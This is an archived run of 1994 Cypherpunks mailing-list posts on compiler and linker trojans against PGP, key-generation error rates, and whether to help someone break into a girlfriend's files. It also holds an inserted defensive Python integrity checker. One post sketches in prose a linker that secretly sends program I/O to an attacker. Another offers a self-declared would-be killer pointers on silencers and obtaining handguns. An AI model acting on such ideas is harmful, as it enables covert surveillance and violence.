On Wed, 28 Dec 1994, Hadmut Danisch wrote:
>
> If the government wants to attack software like pgp it would be
> easier to modify compilers than modifying the crypto sources.
>

A compiler can recognize one specific piece of code or a few specific pieces of code and do something perverse. It cannot recognize functionally equivalent code, this being a high order artificial intelligence problem.

Thus if someone used a perverted compiler to develop, debug, and enhance the target code, he would immediately discover the compiler was perverted.

---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd at netcom.com

From raph at CS.Berkeley.EDU Wed Dec 28 12:04:24 1994
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Wed, 28 Dec 94 12:04:24 PST
Subject: recognizing the essence
In-Reply-To: <199412281820.NAA15426@en.ecn.purdue.edu>
Message-ID: <199412282004.MAA07069@kiwi.CS.Berkeley.EDU>

The most famous and widely used plagiarism detector here at Berkeley must be the one John Ousterhout wrote. It basically detects similarities in program structure (call graph, loops, conditionals, etc.) It was used in the undergraduate compilers class. I believe the output of the program is a list of pairs, ordered by decreasing similarity.
The professor spoke to the top two matches, they both ended up confessing. He didn't check more for lack of time.

I believe the source code _isn't_ publicly available.

Good luck.

Raph

From hfinney at shell.portal.com Wed Dec 28 12:04:44 1994
From: hfinney at shell.portal.com (Hal)
Date: Wed, 28 Dec 94 12:04:44 PST
Subject: Are 2048-bit pgp keys really secure ?
Message-ID: <199412282004.MAA04125@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

One thing to keep in mind is that other things can go wrong than Carmichael-like numbers in finding false primes. You can get hardware errors. Here is my estimate of the chance of an undetected memory parity error.

Let us suppose that a 8 MB PC uses parity protection per byte and gets one parity error per year of operation. This is just a guess but I have occasionally seen parity errors on PC's and I certainly don't use them full time 24 hours a day for a year!

So the chance of a particular byte getting a parity error in a particular one-minute period (approximately the time for a key generation) is 1/(8M * 365 * 24 * 60) or about 2E-13 (2 times 10 to the minus 13). The chances of 2 parity errors, which would then be undetected, would be the square of this, or about 6E-26. During key generation let us just look at the data and say that there are about 256 bytes in the active working set at any time, so the chance of an error in an important byte is about 1.4E-23.

So if your chance of the Fermat test failing is much less than about 10^-23 then you would do better to invest in a more expensive PC than in improving the test. And of course there are other hardware failure modes as well, which should increase this threshold.
Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----

From mab at crypto.com Wed Dec 28 12:20:29 1994
From: mab at crypto.com (Matt Blaze)
Date: Wed, 28 Dec 94 12:20:29 PST
Subject: Why I have a 512 bit PGP key
Message-ID: <199412282021.PAA12355@crypto.com>

>A compiler can recognize one specific piece of code or a few
>specific pieces of code and do something perverse. It cannot
>recognize functionally equivalent code, this
>being a high order artificial intelligence problem.
>
>Thus if someone used a perverted compiler to develop, debug, and
>enhance the target code, he would immediately discover the compiler
>was perverted.
>

If I were going to implement a compiler-based attack against a piece of security software, I'd probably do it entirely by altering the linker. That is, I'd have the linker recognize that it was emitting a program called "pgp" or "pem" or "cfs" or whatever and have it put a wrapper around the final executable module that simply records any I/O and sends it to me. With shared libraries, building such a wrapper would be especially easy; just have all I/O go to your library instead of the standard one.

It's also not hard to imagine ways in which such an attack could be extended to fool even customized versions of systems like tripwire into always reporting fixed results when run on particular files.
-matt

From jalicqui at prairienet.org Wed Dec 28 12:20:56 1994
From: jalicqui at prairienet.org (Jeff Licquia)
Date: Wed, 28 Dec 94 12:20:56 PST
Subject: Why I have a 512 bit PGP key
Message-ID: <9412282021.AA01830@firefly.prairienet.org>

From: Jeff Barber
>Let's face it, creating the compiler-to-recognize-MD5 is quite a difficult
>problem, and if I were your system administrator and wanted to obtain
>access to your files, creating a special compiler version or otherwise
>attempting to cause your integrity check to fail would be one of the last
>forms of attack I'd try.

Perhaps, then, we need to discuss exactly what attacks your average sysadmin would be expected to make. I would think that you'd need to guard against two kinds of sysadmins:

1. The "gentleperson" sysadmin. Though this person might have reason to want to do nasty things to you, (s)he is restricted, either by personal morals or company policy, to doing things that are "proper". Hacking the kernel or the compiler would be out; rather, this person would be more apt to be liberal in his/her use of root privileges, possibly installing user-space keypress monitors (like ttysnoop or some X keygrabber). Schemes like a "personal tripwire", MD5 hashes of various important programs, and so on would be effective against this kind of attacker.

2. "Sysadmin Hatfield." You're McCoy; you get the picture. Nothing is below him/her. Your best protection: never log in.

The problem lies in distinguishing the two, and specifically detecting the latter at any point (in case the former becomes the latter by, say, a policy change), as Eric pointed out.

>The bottom line is that, as an ordinary user, you are relying completely
>on your trust in the system administrator.

...or your computer policy department. Remember, not even sysadmins are God. While it's likely that a sysadmin could hack the kernel to substitute bogus MD5 hashes, doing so in certain environments could earn the sysadmin a quick exit from employment.
If your sysadmin just didn't like you, it's possible to get the upper hand; if the sysadmin has the added advantage of little to no oversight, you're screwed.

From entropy at IntNet.net Wed Dec 28 14:04:39 1994
From: entropy at IntNet.net (Jonathan Cooper)
Date: Wed, 28 Dec 94 14:04:39 PST
Subject: recognizing the essence
In-Reply-To: <199412282004.MAA07069@kiwi.CS.Berkeley.EDU>
Message-ID:

> I believe the source code _isn't_ publicly available.

Perhaps the professor would be willing to run the gentleman who inquired's code samples through it and mail him the output?

I can certainly understand why it's not available. . .

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 )

From ianf at sydney.sgi.com Wed Dec 28 14:10:49 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Wed, 28 Dec 94 14:10:49 PST
Subject: Are 2048-bit pgp keys really secure ?
In-Reply-To: <199412282004.MAA04125@jobe.shell.portal.com>
Message-ID: <9412290859.ZM12937@wiley.sydney.sgi.com>

On Dec 28, 12:04pm, Hal wrote:
> Let us suppose that a 8 MB PC uses parity protection per byte and gets
> one parity error per year of operation. This is just a guess but I have
> occasionally seen parity errors on PC's and I certainly don't use them
> full time 24 hours a day for a year!

Just a mostly-irrelevant aside...

A somewhat disturbing trend has appeared in the low-end cost-sensitive PC SIMM market. Some supposedly 9-bit SIMMs are actually 8-bit SIMMs plus a parity generator. This means that the parity checking is essentially subverted, because the parity bit is generated from the stored contents of memory at read time, rather than the stored contents when it was written to. As such, NO bit errors are detected.
These SIMMs are almost all being produced in Taiwan, and many have the parity generator marked so that the chip appears to be another DRAM. It is worth watching out for.

Why are they doing this? Well, parity generators are much cheaper than the extra DRAM, and so the manufacturers are saving 15-20% on the production price.

Ian.

From tedwards at src.umd.edu Wed Dec 28 14:28:09 1994
From: tedwards at src.umd.edu (Thomas Grant Edwards)
Date: Wed, 28 Dec 94 14:28:09 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <9412281640.AA09644@wombat.sware.com>
Message-ID:

On Wed, 28 Dec 1994, Jeff Barber wrote:
> Let's face it, creating the compiler-to-recognize-MD5 is quite a difficult
> problem, and if I were your system administrator and wanted to obtain
> access to your files, creating a special compiler version or otherwise
> attempting to cause your integrity check to fail would be one of the last
> forms of attack I'd try.

In fact you'd need a totally secure OS to try to achieve this goal. You can have the loader recognize the MD5 or other integrity measures. The loader could even contact an authorization server to see if you have paid the license fee to use the program...

-Thomas

From unicorn at access.digex.net Wed Dec 28 14:29:27 1994
From: unicorn at access.digex.net (Black Unicorn)
Date: Wed, 28 Dec 94 14:29:27 PST
Subject: Breaking into girlfriend's files
In-Reply-To:
Message-ID:

On Sat, 24 Dec 1994, Nesta Stubbs wrote:
> Date: Sat, 24 Dec 1994 08:43:07 +0000
> From: Nesta Stubbs
> To: Cypherpunks
> Subject: Re: Breaking into girlfriend's files
>
> On Sat, 24 Dec 1994, Black Unicorn wrote:
>
> > You can only go two ways with this, either of which is self defeating.
> >
> > 1> All potentially damaging information, by virtue of its potential
> > "wrongful use" shall be banned.
> >
> > 2> All information clearly going to be used for the "wrong purposes"
> > shall be restricted.
> >
> >
> > There is simply no other way to restrict information as you propose.
> >
> How about simply giving the information if you feel like it, and
> withholding it if you don't. And don't bother whether other people give it
> to him. A simple individual choice without attempting to set guidelines
> for morality or any of that worthless shit.
>

You realize of course this simply applies the individual's morality to the problem. It does not remove a subjective imposition.

Of course, I'm not going to argue that there is a duty to disclose requested information, just understand exactly what is taking place here.

>
> i want to know everything http://www.mcs.com/~nesta/home.html
> i want to be everywhere Nesta's Home Page
> i want to fuck everyone in the world &
> i want to do something that matters /-/ a s t e zine
>

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From unicorn at access.digex.net Wed Dec 28 14:32:33 1994
From: unicorn at access.digex.net (Black Unicorn)
Date: Wed, 28 Dec 94 14:32:33 PST
Subject: Breaking into girlfriend's files
In-Reply-To: <9412242006.AA11428@toad.com>
Message-ID:

On Sat, 24 Dec 1994, Ken Arromdee wrote:
> Date: Sat, 24 Dec 94 15:06:43 EST
> From: Ken Arromdee
> To: cypherpunks at toad.com
> Subject: Re: Breaking into girlfriend's files
>
> Black Unicorn:
> >1> All potentially damaging information, by virtue of its potential
> >"wrongful use" shall be banned.
> >2> All information clearly going to be used for the "wrong purposes"
> >shall be restricted.
> >The result in 1>, I think is quite clear.
> >The result in 2>, requires some ONE, some GROUP to decide what is and is
> >not A> "clearly going to be used for," B> "the wrong purposes." ...
> >You end up with either a cut throat thought police regime, or slightly
> >less offensive paternalistic censorship. You choose, what is it you want
> >to have?
>
> Any individual has the right to decide what information to give out.
> If that means the individual has to judge someone else's purposes, then so be it. The
> individual may even try to persuade others not to give out the information.
>
> It only becomes a problem if he's trying to use force--to keep others who
> _do_ want to reveal the information, from revealing it. This is _the_
> difference between the current situation, and real police state censorship;
> censorship prevents someone from speaking who wants to speak; it doesn't
> merely mean that the government itself won't speak to you.

The problem I had was the justification of refusal to disclose in some moral argument. Even more annoying was the poster's attempt to cast that argument as a cypherpunk position (of which there are none).

Like I said, I will be the last to argue there is any sort of duty to disclose, and the first to flame if someone justifies their refusal to disclose on anything other than an individual decision not to. A lecture on morality accompanying a refusal to disclose is just arrogant.

> --
> Ken Arromdee (email: arromdee at jyusenkyou.cs.jhu.edu)
>
> "No boom today. Boom tomorrow, there's always a boom tomorrow." --Ivanova
>

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From nesta at nesta.pr.mcs.net Wed Dec 28 14:40:04 1994
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Wed, 28 Dec 94 14:40:04 PST
Subject: Breaking into girlfriend's files
In-Reply-To:
Message-ID:

On Wed, 28 Dec 1994, Black Unicorn wrote:
> On Sat, 24 Dec 1994, Nesta Stubbs wrote:
>
> > How about simply giving the information if you feel like it, and
> > withholding it if you don't. And don't bother whether other people give it
> > to him. A simple individual choice without attempting to set guidelines
> > for morality or any of that worthless shit.
> >
>
>
> You realize of course this simply applies the individual's morality to the
> problem.
> It does not remove a subjective imposition.
>

What the hell else is human interaction and transferring of information but the non-subjective imposition of a morality (however loose that morality may be). It applies the individual's morality to their interactions with the other person, which is all natural and IMO impossible to stop without encroaching on personal freedom.

> Of course, I'm not going to argue that there is a duty to disclose
> requested information, just understand exactly what is taking place here.
>

the same thing that takes place in any form of communication.

i want to know everything http://www.mcs.com/~nesta/home.html
i want to be everywhere Nesta's Home Page
i want to fuck everyone in the world &
i want to do something that matters /-/ a s t e zine

From unicorn at access.digex.net Wed Dec 28 14:41:27 1994
From: unicorn at access.digex.net (Black Unicorn)
Date: Wed, 28 Dec 94 14:41:27 PST
Subject: PSWD: "The Girlfriend's Opinion"
In-Reply-To:
Message-ID:

On Sun, 25 Dec 1994, Dave Del Torto wrote:
> Date: Sun, 25 Dec 1994 05:26:19 -0800
> From: Dave Del Torto
> To: cypherpunks at toad.com
> Cc: Ian Farquhar ,
> Black Unicorn
> Subject: PSWD: "The Girlfriend's Opinion"
>
> At 8:28 pm 12/23/94, Black Unicorn wrote:
> >Who the hell are you to define the position of cypherpunks?
> >Who the hell are any of us to do this?
>
> Both interesting questions... and self-cancelling ones. As far as I know,
> Cypherpunks define their own personal positions and don't impose theirs on
> any one else, as you yourself seem to have done, Uni. Your argument, much
> like your "standard" is somewhat suspect in my view.

Specifically? (I'm always open to such criticisms)

>
> Regarding your language: please tone it down a little? Rely less on ad
> hominem flames and the word "shit" and more on the strength of your
> arguments and I'd be more inclined to respect your opinions.
> Once I pick through your invective, you "seem" to have a point, but you really do go on
> a bit, making it a lot of work... are you sober as you write these things?

I don't drink. I do have a temper. Of course you have a point, I did apologize to the list.

> On the topic: let me relay an interesting little tidbit I heard recently on
[...]
> a physician.

An interesting parallel. I agree.

> Privacy is Privacy, even if it's your intimate friend's privacy. Just
> because someone trusts you, it doesn't give you any rights to their
> personal data. I've had supposed "friends" try to break into my personal
> files before, so I wouldn't presume to pontificate on who deserves more
> privacy: everyone does. The free flow of information on system security is
> important, but when it sacrifices someone's privacy. If you intend to post
> information on how a system can be compromised, it seems to me that the
> responsible thing to do (as a cypherpunk or a physician) is to first notify
> the sysadmin or password-owner so as to make sure they've been able to
> close their doors, and THEN post the info to others judiciously using only
> enough detail as is necessary for educational purposes (like the doctor
> above).

While I appreciate your attempt to work damage control into the process, I simply cannot agree. The withholding of information, in the cryptographic context, is simply not in any sort of alignment with my position. Speaking of health issues is to bring the matter off point. Crypto is such that it simply cannot advance without specific and DETAILED accounts of flaws and potential attacks. To withhold this information on the grounds that it might be damaging is silly, and moreover, potentially catching and slippery slope like. To withhold it on moral grounds, then to insist that it is in accordance with freedom of information and privacy concerns is to see no farther than the rims of one's glasses.

> Uni, you don't work at a nuclear site, do you? ;)

Nope.
>
> dave
> ___________________________________________________________________________
> "Rudeness is the penultimate refuge of the Incompetent; violence, the last"
>

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From unicorn at access.digex.net Wed Dec 28 14:56:40 1994
From: unicorn at access.digex.net (Black Unicorn)
Date: Wed, 28 Dec 94 14:56:40 PST
Subject: Breaking into girlfriend's files
In-Reply-To: <9412271452.AA23162@yeti.bsnet>
Message-ID:

On Tue, 27 Dec 1994 dmandl at bear.com wrote:
> Date: Tue, 27 Dec 94 09:52:22 EST
> From: dmandl at bear.com
> To: cypherpunks at toad.com
> Subject: Re: Breaking into girlfriend's files
>
> Black Unicorn writes:
>
> > I guess I suffered from the silly idea that as a whole, the members of
> > the list would not put short term morality before the long term goal.
>
> Do me a favor, Uni: I want to assassinate you and all the other members
> of your family. Could you send me some powerful handguns and silencers?
> Oh, and while you're at it, give me all of your addresses and precise
> travel schedules for the next two weeks. As an "amoralist," I'm sure you
> won't put short term morality before my long-term goal. Thanks.

I fear what you request would probably violate many laws. Providing you with weaponry has little to do with providing you the information you might need to obtain and modify such weapons as you will need. I will however be happy to direct you to several publications on the manufacture and use of silencers, disposable and otherwise. I will also, as an academic gesture, be happy to provide you with likely sources or methods to obtain or otherwise control handguns and other such weaponry.

As for my addresses, I'm sure if you're serious about killing me and my family, you'll be able to obtain these.
Arguing that they are in the public domain, unless I have put them there, is just silly, off point and misunderstands the differences between the basic need of publication and distribution of potential weaknesses and attacks for the advancement of crypto as a technology, and the privacy associated with the personal affairs of others.

I will advise you that I take significant personal security measures. Feel free to test these if you like.

>
> > It seems there are those who disagree with me. I would offer the
> > following: While it may be that Joe Break-Into-Girlfriend's-Files may or
> > may not be justified, that is not ours to judge.
>
> I'll judge what I want to, OK?

As long as I don't have to listen to it on a crypto mailing list, fine.

> What are you trying to do, _coerce_ me
> into giving information to someone that I don't want to?

As I have stated, I will never argue a duty to disclose, only that a moral argument cast as a cypherpunks position is outrageous.

> > It is simply for the
> > crypto non-challenged to comment on the security or lack thereof of a
> > given system.
>
> Hmm, sounds like you're telling us what to do. And defining what "we" are,
> to boot. I'm many things besides "crypto non-challenged." I'm an individual
> and an individualist, not a cog with a particular static role in society,
> which is apparently the way you'd like it. If you ask me what the color of
> the sky is, I can say "39" if I want.

Forgive me for not adding "Or say nothing at all" to the end of my comment, I thought the readership of the list astute enough to pick up on this themselves. It seems I was mistaken.

> > As soon as this list turns into a pile of bleeding heart
> > liberals, anxious to embroil themselves in the personal matters of
> > others, it has failed.
>
> Yeah, well it seems you were just as quick as the "bleeding heart liberals"
> to scold others and impose your personal (a-)morality. Typical.
I argued that morality should have never entered into the conversation. If you want to be meta-physical, I suppose this is a "moral" position. I'll discuss this in e-mail if you wish.

> > I cannot believe that people on this list, those who claim to be
> > interested in the preservation of privacy, would support the proposition
> > that knowledge about the strength or weakness of a given system should be
> > suppressed.
>
> No one was suppressing anything or in any way attempting to stop the flow
> of information. They were just expressing their opinions. Just because
> _you_ were unhappy with those opinions, that's no reason to hurl accusations
> of censorship around.

Person A requests information. Person B says no, because the use of the information is unsound in person B's view. Censorship? You tell me.

> I can refuse to give help to anyone I don't feel like helping, and if I feel
> like giving him a piece of my mind in the process, that's my business and his.

It seems everyone is convinced that I was insisting on some sort of duty to disclose. I was not, I will not.

> > I submit that the response should have been the same regardless of the
> > nature of the material.
> >
> > Which is it going to be?
> > 1>
> > Q: "How do you attack X?"
> > A: "Y"
> > or
> > 2>
> > Q: "How do you attack X?"
> > A: "Realistically X should not be attacked, because to allow the
> > widespread lack of confidence in X will destroy society as we know it, and
> > anyhow it's nasty."
>
> Great, I've always wanted to be a simple input-output machine.

What you do in your own home is fine. When it comes to information about the strengths and weaknesses of crypto, a moral judgement is not required.

>
> Pseudo-individualist Republican rubbish...

Personal opinion which you insisted I refrain from expressing. I believe the word you used was "Typical"

> --Dave.
>

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From unicorn at access.digex.net Wed Dec 28 15:06:32 1994
From: unicorn at access.digex.net (Black Unicorn)
Date: Wed, 28 Dec 94 15:06:32 PST
Subject: Breaking into girlfriend's files
In-Reply-To:
Message-ID:

On Tue, 27 Dec 1994, Robert Hettinga wrote:
> Date: Tue, 27 Dec 1994 18:43:38 -0500
> From: Robert Hettinga
> To: cypherpunks at toad.com
> Subject: Re: Breaking into girlfriend's files
>
> > Psst! Is Tim here?
> What? He's on vacation?
> Cool.
> back in. Adjusts underwear. Taps microphone...>
>
> Ahem.
>
> > := At 9:52 AM 12/27/94, dmandl at bear.com
> >> := Black Unicorn
[...]
>
> dmandl> Great, I've always wanted to be a simple input-output machine.
> dmandl>
> dmandl> Pseudo-individualist Republican rubbish...
>
> As a pedigreed piece of Pseudo-individualist Republican rubbish (PIRR)
> myself, I take exception to that remark. Associating noble PIRR with
> pseudonyms named for inappropriately-colored fictional creatures really
> gets my, ahem, goat.

Hey, you're talking about a creature that's been in my family for generations, bub.

> It seems to me the proper answer to the original poster of this thread was
> to greet it with a deafening silence. First, because the answer is trivial
> given the technical level of this list (well, the average technical level,
> anyway) and can be obtained elsewhere. Second, because there is such a
> diversity of ethics, politics, and moral belief on this list, because the
> fundamental nature of the technology we discuss here and its potential
> impact on human society is so great, to address the question on its merits
> would unleash enough verbal flatulence (including my own, I'm afraid) to
> rival even the best Mel Brooks epic.

Exactly.
> To employ an appropriately PIRR sports metaphor, the question was a pitch
> so *obviously* a slow lob over the plate, such an *easy* target for
> flamage, that it should have been very apparent to anybody here that it
> wouldn't have been fair at all to the pitcher to even swing at it.

*Sound of hammer hitting nail on head*

> Short of letting it fall into the mitt with a dull thud, a pointer to the
> appropriate HAKK3r d00d list would have been the next best thing. This was
> done. Next on the list would be actually answering the question as quickly
> as possible. This was done. (Thank you, Perry.) The querent will probably
> not be able to execute the proper solution anyway. He'll probably run out
> of steam before executing it, and if he does it anyway, he deserves all the
> shit he'll find himself in upon decrypting those files. We were all young
> and stupid once. Some of us still are, it appears.

Yes. (To all)

>
> Cheers,
> Bob Hettinga
>
>
> P.S. My apologies to M(s)r. 'Corn if I stepped on he/she/it's er, hooves.
> I meant to cast no asparagas upon he/she/it's choice of nym-name.

His choice of nym-name. My hooves are tough.
^^^

>
> -----------------
> Robert Hettinga (rah at shipwright.com) "There is no difference between someone
> Shipwright Development Corporation who eats too little and sees Heaven and
> 44 Farquhar Street someone who drinks too much and sees
> Boston, MA 02331 USA snakes." -- Bertrand Russell
> (617) 323-7923
>

-uni- (Dark)

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!
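Added example (not part of any message in this archive): a minimal sketch of the "personal tripwire" that Jeff Licquia's 28 Dec message in the "Why I have a 512 bit PGP key" thread names as a defence against the "gentleperson" sysadmin. SHA-256 is swapped in for the MD5 named in the thread, and the function names, the HMAC seal on the baseline and the off-host key are assumptions of this sketch; as that thread itself notes, a check like this is no help against a modified kernel or loader that lies about file contents.

```python
import hashlib
import hmac
import json
import os
import stat
import tempfile


def file_record(path):
    """Attributes that change when a watched program is replaced or re-permissioned."""
    st = os.stat(path)
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(65536), b""):
            digest.update(block)
    return {
        "sha256": digest.hexdigest(),
        "size": st.st_size,
        "mode": oct(stat.S_IMODE(st.st_mode)),
        "uid": st.st_uid,
    }


def _seal(records, key):
    """HMAC over a canonical encoding of the records (key assumed kept off the host)."""
    body = json.dumps(records, sort_keys=True).encode()
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def build_baseline(paths, key):
    """Snapshot the watched files and seal the snapshot so it cannot be silently edited."""
    records = {p: file_record(p) for p in sorted(paths)}
    return json.dumps({"records": records, "tag": _seal(records, key)})


def check(baseline_json, key):
    """Compare the current files with a sealed baseline and return a list of findings."""
    doc = json.loads(baseline_json)
    tag = str(doc.get("tag", "")).encode()
    if not hmac.compare_digest(_seal(doc["records"], key).encode(), tag):
        # Someone without the key rewrote the baseline: trust nothing in it.
        return [("BASELINE-TAMPERED", None, "HMAC tag does not verify")]
    findings = []
    for path, old in doc["records"].items():
        try:
            new = file_record(path)
        except FileNotFoundError:
            findings.append(("MISSING", path, "file no longer exists"))
            continue
        for field in ("sha256", "size", "mode", "uid"):
            if new[field] != old[field]:
                findings.append(("CHANGED", path, f"{field}: {old[field]} -> {new[field]}"))
    return findings


def demo():
    """Constructed scenario in a temp directory; file names and contents are made up."""
    key = b"constructed-demo-key-kept-off-host"
    with tempfile.TemporaryDirectory() as d:
        pgp, editor, shell = (os.path.join(d, n) for n in ("pgp", "editor", "shell"))
        for path, content in ((pgp, b"original pgp binary"), (editor, b"editor"),
                              (shell, b"shell")):
            with open(path, "wb") as fh:
                fh.write(content)
            os.chmod(path, 0o755)
        baseline = build_baseline([pgp, editor, shell], key)
        clean = check(baseline, key)

        # Same-length replacement: a size check alone would not notice it.
        with open(pgp, "wb") as fh:
            fh.write(b"trojaned pgp binary")
        os.chmod(editor, 0o777)   # made world-writable
        os.remove(shell)
        dirty = check(baseline, key)

        # Root rewrites the stored hash to match the replacement but has no key.
        doc = json.loads(baseline)
        doc["records"][pgp]["sha256"] = file_record(pgp)["sha256"]
        forged = check(json.dumps(doc), key)
    return clean, dirty, forged


if __name__ == "__main__":
    for label, result in zip(("clean", "dirty", "forged baseline"), demo()):
        print(label, result)
```

The seal only moves the trust problem: the key still has to be typed or loaded somewhere, so the check is best run from media and a machine the sysadmin in question does not control.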
From unicorn at access.digex.net Wed Dec 28 15:12:11 1994
From: unicorn at access.digex.net (Black Unicorn)
Date: Wed, 28 Dec 94 15:12:11 PST
Subject: Breaking into girlfriend's files
In-Reply-To: <9412281117.ZM10874@wiley.sydney.sgi.com>
Message-ID:

On Wed, 28 Dec 1994, Ian Farquhar wrote:
> Date: Wed, 28 Dec 1994 11:17:19 -0500
> From: Ian Farquhar
> To: cypherpunks at toad.com
> Subject: Re: Breaking into girlfriend's files
>
> On Dec 23, 11:28pm, Black Unicorn wrote:
>
> > I guess I suffered from the silly idea that as a whole, the members of
> > the list would not put short term morality before the long term goal.
>
> Possibly you did, although I question whether the two are incompatible.

A legitimate issue. Perhaps one for e-mail?

> > I cannot believe that people on this list, those who claim to be
> > interested in the preservation of privacy, would support the proposition
> > that knowledge about the strength or weakness of a given system should be
> > suppressed.
>
> I don't recall anyone who did mention censorship. I saw a lot of people
> suggesting that helping the original pathetic individual was not a
> good idea, and then several howls of outrage accusing these people of
> censorship. There is a difference between non-disclosure and censorship,
> and it's not an arbitrary one either.

When based on individual judgement, fine, when based and justified by some individual's concept of what cypherpunks stand for and what they should or should not be disclosing, forget it.

>
> > Disgusting. Get off this list, you belong on alt.codependency.recovery,
> > or alt.bleeding.liberal.
>
> But isn't that exactly what you're proposing? "Get off the list because
> your position disagrees with mine." Sounds like censorship to me,
> except that "Black Unicorn" is the one deciding what is acceptable.

I am properly chastised, and will again, apologize to both the list and the individual.
(Sorry) Looking at those words, I can't imagine what infancy prompted me to type them. (Sigh) I would say black outs, but I really don't drink much.

> Ian.
>
> #include
>
>

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From cjl at welchlink.welch.jhu.edu Wed Dec 28 15:35:34 1994
From: cjl at welchlink.welch.jhu.edu (cjl)
Date: Wed, 28 Dec 94 15:35:34 PST
Subject: Pointers for www pages, please
Message-ID:

I'm looking for crypto/security/cypherpunk URL's

obviously
ftp.csua.berkeley.edu
http://www.c2.org

What's the proper URL for Vince Cates web-page?

Other suggestions to me by E-mail please,

My purpose for this is mostly to be able to point people I run into on the WWW towards info on C-punk issues and warez d00D :-)

Cypherpunk antonym/homonym of the day
awareness not equal a-wareness (a state of not having software . . . .)

C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / )

From nsb at radiomail.net Wed Dec 28 15:36:12 1994
From: nsb at radiomail.net (NSB's Portable (via RadioMail))
Date: Wed, 28 Dec 94 15:36:12 PST
Subject: properties of FV
Message-ID: <199412282334.PAA18333@radiomail.net>

Once again, I've been on the road, and this time out of RadioMail range, so I'm a bit behind on my mail again. I hope that my replies aren't too redundant with other things that have already been said on the mailing list(s), but I can't check without delaying my answer even longer, because my poor RadioMail service is now so backlogged that it may take a few days just for it to download everything...

At 11:17 AM 12/21/94 -0800, Eric Hughes wrote:
>The perceived need for crypto "below the line" comes from the
>viewpoint that the system needs to be completely secure because crypto
>failures must be prevented at all cost. Rubbish.
>The subsequent claim that you couldn't possibly put crypto on the Unix boxes which
>are in your control is therefore also bogus.

This is interesting; that was not the way I saw it, but I can see your point of view. From my end, I don't believe in "completely secure" as a reasonable goal for ANYthing, so this certainly wasn't what I intended to hold out for. Rather, my perspective is that if you add crypto, you should be getting something for it. It's easy to see how you get privacy benefits above the line, and if you do it right you might be able to get some security benefits too (though I haven't yet convinced myself of this). However, if we're going to be able to make some claims as to what we have added, I'd really like to be clear about them.

What you've pointed out, that I hadn't thought of, is that if we put the crypto engine on the "above the line" system, we might get some significant and explainable benefits -- in particular, we gain protection of the user's privacy to the extent that breaking privacy now requires breaking into the above-the-line system, rather than merely snooping on the wire. This is true, and I thank you for pointing it out.

I think I was a bit confused by the fact that I've thought of some really nice things that can be done when crypto is added BELOW the line, specifically related to the credit card information that ONLY lives there.

What this means, however, is that there are now some useful things that can be done with crypto above the line, and even more that can be done with crypto below the line. If they were equally easy, it would make sense to add crypto below the line, as it would buy us more. However, as I've made very clear previously, it is NOT equally easy -- adding it above the line is much easier. This presents us with a new complication to the already complex tradeoffs involved in deciding where to devote our resources.
I'm sure you'll understand if I'm reluctant to reach such an important decision overnight, but you've definitely opened my eyes to an attractive "middle path" in the use of optional cryptography in FV transactions.

(On a technical level, the only thing I'd *really* like to wait for is the stabilization of the MIME-PGP work, as we'll need it in order to recognize a PGP-encrypted application/green-commerce MIME entity. As you know, I've been active in the MIME-PGP effort, and one very plausible scenario would be to make the FV server be an early implementation of that specification. However, the MIME-PGP draft that I co-wrote last summer is undergoing radical revision, so I'm reluctant to see that version implemented in our server.)

In short, you've got a very good point, and you've probably just hastened the day when we support optional PGP encryption, but we're not ready to make any promises or timetables quite yet.

>I really don't believe FV would have to put crypto on EDS equipment.

"Have to" is the key phrase here. You're absolutely right, and you've pointed out that there's real value in putting crypto on *our* equipment. The attitude I had previously expressed might have been an example of "the best is the enemy of the good" which is something I try to avoid. On the other hand, there are undeniable advantages to putting crypto on EDS equipment -- it's an interesting tradeoff.

>The message that it's "not necessary for commerce" is reactionary to
>the assertation that it is necessary. By positioning FV in an
>adversarial role with respect to cryptography, you'll have the same
>problem no matter when you introduce crypto. I personally think
>you'll have a harder time changing your position later, after more
>people have been exposed to FV's current position.
>
>A much better public position is that "you can do commerce with or
>without crypto", which asserts independence rather than negation.
>These two public positions are _not_ identical; they are similar, but
>don't be fooled by some positivist notion of denotation into thinking
>that they're the same.

This is another very important point. They may mean the same in some formal sense, which is what I believed, but your wording is MUCH more constructive. So let me state, with you, that I believe that you can do commerce with or without crypto, and that on the current Internet there are advantages and disadvantages to each approach. I suspect that we can further agree that privacy is one of the advantages of crypto-commerce, and that rapid deployment is one of the advantages of non-crypto-commerce. We may differ on some subtler aspects of that devil word, "security", but for the most part I think we're now in violent agreement.

-- Nathaniel

From rishab at dxm.ernet.in Wed Dec 28 15:43:19 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Wed, 28 Dec 94 15:43:19 PST
Subject: DigiCash unlicensed for US use
Message-ID:

